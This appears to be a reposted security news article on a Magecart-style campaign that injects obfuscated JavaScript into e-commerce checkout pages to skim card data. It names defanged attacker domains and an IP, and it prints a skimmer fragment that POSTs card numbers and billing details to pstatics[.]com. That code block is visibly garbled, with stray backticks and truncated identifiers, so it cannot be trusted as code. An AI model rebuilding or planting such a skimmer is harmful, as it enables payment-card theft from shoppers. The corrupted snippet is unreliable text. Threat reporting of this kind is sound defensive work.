The threat landscape for e-commerce websites has once again shifted with the emergence of a sophisticated Magecart-style attack campaign, characterized by the deployment of obfuscated JavaScript to harvest sensitive payment information.
The campaign first came to light in mid-September 2025 following a tweet indicating an ongoing skimming operation, which was later investigated in detail by cybersecurity researcher, Himanshu Anand.
This new episode demonstrates the persistent ingenuity of web skimming groups leveraging client-side injection to target unsuspecting financial transactions at scale.
The attack vectors in question involve the injection of malicious JavaScript, hosted on attacker-controlled domains such as cc-analytics[.]com, into vulnerable checkout pages of compromised e-commerce platforms.
Once inserted, the script seamlessly blends into legitimate payment workflows, hooking into form fields and event listeners to silently exfiltrate payment data.
The initial code observed was heavily obfuscated, designed both to evade detection by security scanners and to frustrate analysis by incident responders.
While the code has been reused across several campaigns, with the malware logic replicated under different domain names such as getnjs[.]com, getvjs[.]com, and utilanalytics[.]com, primarily hosted on infrastructure like IP address 45.61.136.141.
.webp "New Magecart Skimmer Attack With Malicious JavaScript Injection to Skim Payment Data 3")
Cybersecurity researcher, Himanshu Anand, noted the malware’s ability to leverage passive DNS and infrastructure fingerprinting to expand its operational reach.
By analyzing public telemetry from sources like URLScan and WHOIS records, Anand was able to map out a constellation of related domains linked to a single cluster of attacker infrastructure.
These pivots revealed more than a dozen active domains, some masquerading as legitimate analytics or utility services, each serving identical or near-identical skimmer payloads.
The Malware’s Infection Mechanism
Central to the success of this Magecart operation is its infection mechanism: a highly automated skimmer script injected via [script src = "https://cybersecuritynews.com/new-magecart-skimmer-attack/https[:]//www[.]cc-analytics[.]com/app[.]js"].
Once active, the code establishes event hooks on payment input fields, such as credit card numbers and billing addresses. When triggered, the script collects stolen credentials and promptly dispatches them to a remote server (pstatics[.]com) using XMLHttpRequest and FormData objects.
The core data exfiltration logic can be described as follows:-
function sendStolenData ("data```
const xhr"```"new XMLHttp"```uest ();
xhr```en ('POST', '```ps[:]//www.pstatics.com/i```
const form```a = "new Form"```a ();
form```a[.]append ('uid', "data```rdNumber");
rmData[.]appendid', data[.]billingo);
xhr[.]send"rmData"); }The design ensures that only valid, non-test credentials—those meeting certain length criteria—are transmitted, maximizing the quality and value of stolen data.
This infection pathway is further reinforced by persistent infrastructure, with attackers recycling domain patterns over time.
Free live webinar on new malware tactics from our analysts! Learn advanced detection techniques -> Register for Free
Source link
